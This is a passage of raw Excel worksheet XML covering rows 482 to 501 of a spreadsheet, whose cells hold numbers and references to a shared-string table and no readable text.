      <c r="V482" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W482" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X482" s="12">
        <v>3</v>
      </c>
      <c r="Y482" s="12" t="s">
        <v>3797</v>
      </c>
    </row>
    <row r="483" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A483" s="12">
        <v>1996</v>
      </c>
      <c r="B483" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C483" s="12" t="s">
        <v>28492</v>
      </c>
      <c r="D483" s="12" t="s">
        <v>28740</v>
      </c>
      <c r="F483" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G483" s="12" t="s">
        <v>3813</v>
      </c>
      <c r="H483" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I483" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J483" s="12" t="s">
        <v>319</v>
      </c>
      <c r="K483" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L483" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M483" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N483" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O483" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P483" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q483" s="12">
        <v>2.6</v>
      </c>
      <c r="R483" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S483" s="12" t="s">
        <v>3814</v>
      </c>
      <c r="T483" s="12" t="s">
        <v>1933</v>
      </c>
      <c r="U483" s="12" t="s">
        <v>3815</v>
      </c>
      <c r="V483" s="12" t="s">
        <v>3816</v>
      </c>
      <c r="W483" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X483" s="12">
        <v>1</v>
      </c>
      <c r="Y483" s="12" t="s">
        <v>3817</v>
      </c>
    </row>
    <row r="484" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A484" s="12">
        <v>1998</v>
      </c>
      <c r="B484" s="12" t="s">
        <v>28741</v>
      </c>
      <c r="C484" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D484" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F484" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G484" s="12" t="s">
        <v>3818</v>
      </c>
      <c r="H484" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I484" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J484" s="12" t="s">
        <v>347</v>
      </c>
      <c r="K484" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L484" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M484" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N484" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O484" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P484" s="12" t="s">
        <v>3819</v>
      </c>
      <c r="Q484" s="12">
        <v>2.4</v>
      </c>
      <c r="R484" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S484" s="12" t="s">
        <v>3820</v>
      </c>
      <c r="T484" s="12" t="s">
        <v>3821</v>
      </c>
      <c r="U484" s="12" t="s">
        <v>3822</v>
      </c>
      <c r="V484" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W484" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X484" s="12">
        <v>7</v>
      </c>
      <c r="Y484" s="12" t="s">
        <v>3823</v>
      </c>
    </row>
    <row r="485" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A485" s="12">
        <v>2006</v>
      </c>
      <c r="B485" s="12" t="s">
        <v>28742</v>
      </c>
      <c r="C485" s="12" t="s">
        <v>28743</v>
      </c>
      <c r="D485" s="12" t="s">
        <v>28744</v>
      </c>
      <c r="E485" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F485" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G485" s="12" t="s">
        <v>3824</v>
      </c>
      <c r="H485" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I485" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J485" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K485" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L485" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M485" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N485" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O485" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P485" s="12" t="s">
        <v>3825</v>
      </c>
      <c r="Q485" s="12">
        <v>2.6</v>
      </c>
      <c r="R485" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S485" s="12" t="s">
        <v>3826</v>
      </c>
      <c r="T485" s="12" t="s">
        <v>3827</v>
      </c>
      <c r="U485" s="12" t="s">
        <v>3828</v>
      </c>
      <c r="V485" s="12" t="s">
        <v>48</v>
      </c>
      <c r="W485" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X485" s="12">
        <v>6</v>
      </c>
      <c r="Y485" s="12" t="s">
        <v>3829</v>
      </c>
    </row>
    <row r="486" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A486" s="12">
        <v>2008</v>
      </c>
      <c r="B486" s="12" t="s">
        <v>28745</v>
      </c>
      <c r="D486" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F486" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G486" s="12" t="s">
        <v>3830</v>
      </c>
      <c r="H486" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I486" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J486" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K486" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L486" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M486" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N486" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O486" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P486" s="12" t="s">
        <v>3831</v>
      </c>
      <c r="Q486" s="12">
        <v>2.6</v>
      </c>
      <c r="R486" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S486" s="12" t="s">
        <v>3832</v>
      </c>
      <c r="T486" s="12" t="s">
        <v>3833</v>
      </c>
      <c r="U486" s="12" t="s">
        <v>3834</v>
      </c>
      <c r="V486" s="12" t="s">
        <v>1174</v>
      </c>
      <c r="W486" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X486" s="12">
        <v>5</v>
      </c>
      <c r="Y486" s="12" t="s">
        <v>3835</v>
      </c>
    </row>
    <row r="487" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A487" s="12">
        <v>2011</v>
      </c>
      <c r="B487" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C487" s="12" t="s">
        <v>28548</v>
      </c>
      <c r="D487" s="12" t="s">
        <v>28746</v>
      </c>
      <c r="F487" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G487" s="12" t="s">
        <v>3836</v>
      </c>
      <c r="H487" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I487" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J487" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K487" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L487" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M487" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N487" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O487" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P487" s="12" t="s">
        <v>3837</v>
      </c>
      <c r="Q487" s="12">
        <v>2.6</v>
      </c>
      <c r="R487" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S487" s="12" t="s">
        <v>3838</v>
      </c>
      <c r="T487" s="12" t="s">
        <v>3839</v>
      </c>
      <c r="U487" s="12" t="s">
        <v>3840</v>
      </c>
      <c r="V487" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W487" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X487" s="12">
        <v>2</v>
      </c>
      <c r="Y487" s="12" t="s">
        <v>3841</v>
      </c>
    </row>
    <row r="488" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A488" s="12">
        <v>2017</v>
      </c>
      <c r="B488" s="12" t="s">
        <v>29810</v>
      </c>
      <c r="C488" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D488" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E488" s="12" t="s">
        <v>31430</v>
      </c>
      <c r="F488" s="12" t="s">
        <v>29728</v>
      </c>
      <c r="G488" s="12" t="s">
        <v>3842</v>
      </c>
      <c r="H488" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I488" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J488" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K488" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L488" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M488" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N488" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O488" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P488" s="12" t="s">
        <v>3798</v>
      </c>
      <c r="Q488" s="12">
        <v>2.6</v>
      </c>
      <c r="R488" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S488" s="12" t="s">
        <v>3843</v>
      </c>
      <c r="T488" s="12" t="s">
        <v>3844</v>
      </c>
      <c r="U488" s="12" t="s">
        <v>3845</v>
      </c>
      <c r="V488" s="12" t="s">
        <v>1760</v>
      </c>
      <c r="W488" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X488" s="12">
        <v>3</v>
      </c>
      <c r="Y488" s="12" t="s">
        <v>3846</v>
      </c>
    </row>
    <row r="489" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A489" s="12">
        <v>2019</v>
      </c>
      <c r="B489" s="12" t="s">
        <v>28747</v>
      </c>
      <c r="D489" s="12" t="s">
        <v>28748</v>
      </c>
      <c r="E489" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F489" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G489" s="12" t="s">
        <v>3847</v>
      </c>
      <c r="H489" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I489" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J489" s="12" t="s">
        <v>1609</v>
      </c>
      <c r="K489" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L489" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M489" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N489" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O489" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P489" s="12" t="s">
        <v>3848</v>
      </c>
      <c r="Q489" s="12">
        <v>2.6</v>
      </c>
      <c r="R489" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S489" s="12" t="s">
        <v>3849</v>
      </c>
      <c r="T489" s="12" t="s">
        <v>3850</v>
      </c>
      <c r="U489" s="12" t="s">
        <v>3851</v>
      </c>
      <c r="V489" s="12" t="s">
        <v>19</v>
      </c>
      <c r="W489" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X489" s="12">
        <v>18</v>
      </c>
      <c r="Y489" s="12" t="s">
        <v>3852</v>
      </c>
    </row>
    <row r="490" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A490" s="12">
        <v>2024</v>
      </c>
      <c r="B490" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D490" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E490" s="12" t="s">
        <v>31466</v>
      </c>
      <c r="F490" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G490" s="12" t="s">
        <v>3853</v>
      </c>
      <c r="H490" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I490" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J490" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K490" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L490" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M490" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N490" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O490" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P490" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q490" s="12">
        <v>2.6</v>
      </c>
      <c r="R490" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S490" s="12" t="s">
        <v>3854</v>
      </c>
      <c r="T490" s="12" t="s">
        <v>3855</v>
      </c>
      <c r="U490" s="12" t="s">
        <v>3856</v>
      </c>
      <c r="V490" s="12" t="s">
        <v>1881</v>
      </c>
      <c r="W490" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X490" s="12">
        <v>1</v>
      </c>
      <c r="Y490" s="12" t="s">
        <v>3857</v>
      </c>
    </row>
    <row r="491" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A491" s="12">
        <v>2025</v>
      </c>
      <c r="B491" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C491" s="12" t="s">
        <v>28749</v>
      </c>
      <c r="D491" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E491" s="18" t="s">
        <v>31425</v>
      </c>
      <c r="F491" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G491" s="12" t="s">
        <v>3858</v>
      </c>
      <c r="H491" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I491" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J491" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="K491" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L491" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M491" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N491" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O491" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P491" s="12" t="s">
        <v>3859</v>
      </c>
      <c r="Q491" s="12">
        <v>2.6</v>
      </c>
      <c r="R491" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S491" s="12" t="s">
        <v>3860</v>
      </c>
      <c r="T491" s="12" t="s">
        <v>3861</v>
      </c>
      <c r="U491" s="12" t="s">
        <v>3862</v>
      </c>
      <c r="V491" s="12" t="s">
        <v>3784</v>
      </c>
      <c r="W491" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X491" s="12">
        <v>13</v>
      </c>
      <c r="Y491" s="12" t="s">
        <v>3863</v>
      </c>
    </row>
    <row r="492" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A492" s="12">
        <v>2026</v>
      </c>
      <c r="B492" s="12" t="s">
        <v>28750</v>
      </c>
      <c r="C492" s="12" t="s">
        <v>28751</v>
      </c>
      <c r="D492" s="12" t="s">
        <v>28752</v>
      </c>
      <c r="F492" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G492" s="12" t="s">
        <v>3864</v>
      </c>
      <c r="H492" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I492" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J492" s="12" t="s">
        <v>2643</v>
      </c>
      <c r="K492" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L492" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M492" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N492" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O492" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P492" s="12" t="s">
        <v>3798</v>
      </c>
      <c r="Q492" s="12">
        <v>2.6</v>
      </c>
      <c r="R492" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S492" s="12" t="s">
        <v>3860</v>
      </c>
      <c r="T492" s="12" t="s">
        <v>3865</v>
      </c>
      <c r="U492" s="12" t="s">
        <v>3866</v>
      </c>
      <c r="V492" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="W492" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X492" s="12">
        <v>13</v>
      </c>
      <c r="Y492" s="12" t="s">
        <v>3867</v>
      </c>
    </row>
    <row r="493" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A493" s="12">
        <v>2034</v>
      </c>
      <c r="B493" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D493" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F493" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G493" s="12" t="s">
        <v>3868</v>
      </c>
      <c r="H493" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I493" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J493" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K493" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L493" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M493" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N493" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O493" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P493" s="12" t="s">
        <v>3869</v>
      </c>
      <c r="Q493" s="12">
        <v>2.6</v>
      </c>
      <c r="R493" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S493" s="12" t="s">
        <v>3870</v>
      </c>
      <c r="T493" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U493" s="12" t="s">
        <v>3871</v>
      </c>
      <c r="V493" s="12" t="s">
        <v>197</v>
      </c>
      <c r="W493" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X493" s="12">
        <v>5</v>
      </c>
      <c r="Y493" s="12" t="s">
        <v>3872</v>
      </c>
    </row>
    <row r="494" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A494" s="12">
        <v>2035</v>
      </c>
      <c r="B494" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D494" s="12" t="s">
        <v>28753</v>
      </c>
      <c r="F494" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G494" s="12" t="s">
        <v>3873</v>
      </c>
      <c r="H494" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I494" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J494" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K494" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L494" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M494" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N494" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O494" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P494" s="12" t="s">
        <v>3874</v>
      </c>
      <c r="Q494" s="12">
        <v>2.6</v>
      </c>
      <c r="R494" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S494" s="12" t="s">
        <v>3875</v>
      </c>
      <c r="T494" s="12" t="s">
        <v>3876</v>
      </c>
      <c r="U494" s="12" t="s">
        <v>3877</v>
      </c>
      <c r="V494" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W494" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X494" s="12">
        <v>0</v>
      </c>
      <c r="Y494" s="12" t="s">
        <v>3878</v>
      </c>
    </row>
    <row r="495" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A495" s="12">
        <v>2040</v>
      </c>
      <c r="B495" s="12" t="s">
        <v>28754</v>
      </c>
      <c r="C495" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D495" s="12" t="s">
        <v>28755</v>
      </c>
      <c r="F495" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G495" s="12" t="s">
        <v>3879</v>
      </c>
      <c r="H495" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I495" s="12" t="s">
        <v>925</v>
      </c>
      <c r="J495" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K495" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L495" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M495" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N495" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O495" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P495" s="12" t="s">
        <v>3798</v>
      </c>
      <c r="Q495" s="12">
        <v>2.6</v>
      </c>
      <c r="R495" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S495" s="12" t="s">
        <v>3880</v>
      </c>
      <c r="T495" s="12" t="s">
        <v>3881</v>
      </c>
      <c r="U495" s="12" t="s">
        <v>3882</v>
      </c>
      <c r="V495" s="12" t="s">
        <v>3883</v>
      </c>
      <c r="W495" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X495" s="12">
        <v>6</v>
      </c>
      <c r="Y495" s="12" t="s">
        <v>3884</v>
      </c>
    </row>
    <row r="496" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A496" s="12">
        <v>2058</v>
      </c>
      <c r="B496" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D496" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F496" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G496" s="12" t="s">
        <v>3891</v>
      </c>
      <c r="H496" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I496" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J496" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K496" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L496" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M496" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N496" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O496" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P496" s="12" t="s">
        <v>3885</v>
      </c>
      <c r="Q496" s="12">
        <v>2.6</v>
      </c>
      <c r="R496" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S496" s="12" t="s">
        <v>3892</v>
      </c>
      <c r="T496" s="12" t="s">
        <v>3893</v>
      </c>
      <c r="U496" s="12" t="s">
        <v>3894</v>
      </c>
      <c r="V496" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W496" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X496" s="12">
        <v>1</v>
      </c>
      <c r="Y496" s="12" t="s">
        <v>3895</v>
      </c>
    </row>
    <row r="497" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A497" s="12">
        <v>2063</v>
      </c>
      <c r="B497" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C497" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D497" s="12" t="s">
        <v>28755</v>
      </c>
      <c r="F497" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G497" s="12" t="s">
        <v>3898</v>
      </c>
      <c r="H497" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I497" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J497" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K497" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L497" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M497" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N497" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O497" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P497" s="12" t="s">
        <v>3798</v>
      </c>
      <c r="Q497" s="12">
        <v>2.6</v>
      </c>
      <c r="R497" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S497" s="12" t="s">
        <v>3899</v>
      </c>
      <c r="T497" s="12" t="s">
        <v>3900</v>
      </c>
      <c r="U497" s="12" t="s">
        <v>3901</v>
      </c>
      <c r="V497" s="12" t="s">
        <v>3902</v>
      </c>
      <c r="W497" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X497" s="12">
        <v>21</v>
      </c>
      <c r="Y497" s="12" t="s">
        <v>3903</v>
      </c>
    </row>
    <row r="498" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A498" s="12">
        <v>2071</v>
      </c>
      <c r="B498" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D498" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F498" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G498" s="12" t="s">
        <v>3904</v>
      </c>
      <c r="H498" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I498" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J498" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K498" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L498" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M498" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N498" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O498" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P498" s="12" t="s">
        <v>3905</v>
      </c>
      <c r="Q498" s="12">
        <v>2.6</v>
      </c>
      <c r="R498" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S498" s="12" t="s">
        <v>3906</v>
      </c>
      <c r="T498" s="12" t="s">
        <v>3907</v>
      </c>
      <c r="U498" s="12" t="s">
        <v>3908</v>
      </c>
      <c r="V498" s="12" t="s">
        <v>1068</v>
      </c>
      <c r="W498" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X498" s="12">
        <v>6</v>
      </c>
      <c r="Y498" s="12" t="s">
        <v>3909</v>
      </c>
    </row>
    <row r="499" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A499" s="12">
        <v>2075</v>
      </c>
      <c r="B499" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C499" s="12" t="s">
        <v>29794</v>
      </c>
      <c r="D499" s="12" t="s">
        <v>28756</v>
      </c>
      <c r="F499" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G499" s="12" t="s">
        <v>3910</v>
      </c>
      <c r="H499" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I499" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J499" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K499" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L499" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M499" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N499" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O499" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P499" s="12" t="s">
        <v>3798</v>
      </c>
      <c r="Q499" s="12">
        <v>2.6</v>
      </c>
      <c r="R499" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S499" s="12" t="s">
        <v>3911</v>
      </c>
      <c r="T499" s="12" t="s">
        <v>3912</v>
      </c>
      <c r="U499" s="12" t="s">
        <v>3913</v>
      </c>
      <c r="V499" s="12" t="s">
        <v>1785</v>
      </c>
      <c r="W499" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X499" s="12">
        <v>1</v>
      </c>
      <c r="Y499" s="12" t="s">
        <v>3914</v>
      </c>
    </row>
    <row r="500" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A500" s="12">
        <v>2090</v>
      </c>
      <c r="B500" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C500" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D500" s="12" t="s">
        <v>28757</v>
      </c>
      <c r="E500" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F500" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G500" s="12" t="s">
        <v>3917</v>
      </c>
      <c r="H500" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I500" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J500" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K500" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L500" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M500" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N500" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O500" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P500" s="12" t="s">
        <v>3918</v>
      </c>
      <c r="Q500" s="12">
        <v>2.6</v>
      </c>
      <c r="R500" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S500" s="12" t="s">
        <v>3919</v>
      </c>
      <c r="T500" s="12" t="s">
        <v>3920</v>
      </c>
      <c r="U500" s="12" t="s">
        <v>3921</v>
      </c>
      <c r="V500" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W500" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X500" s="12">
        <v>33</v>
      </c>
      <c r="Y500" s="12" t="s">
        <v>3922</v>
      </c>
    </row>
    <row r="501" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A501" s="12">
        <v>2094</v>
      </c>
      <c r="B501" s="12" t="s">
        <v>28758</v>
      </c>
      <c r="D501" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F501" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G501" s="12" t="s">
        <v>3923</v>
      </c>
      <c r="H501" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I501" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J501" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K501" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L501" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M501" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N501" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O501" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P501" s="12" t="s">
        <v>3798</v>
      </c>
      <c r="Q501" s="12">
        <v>2.6</v>
      </c>
      <c r="R501" s="12" t="s">
        <v>17</v>
      </c>
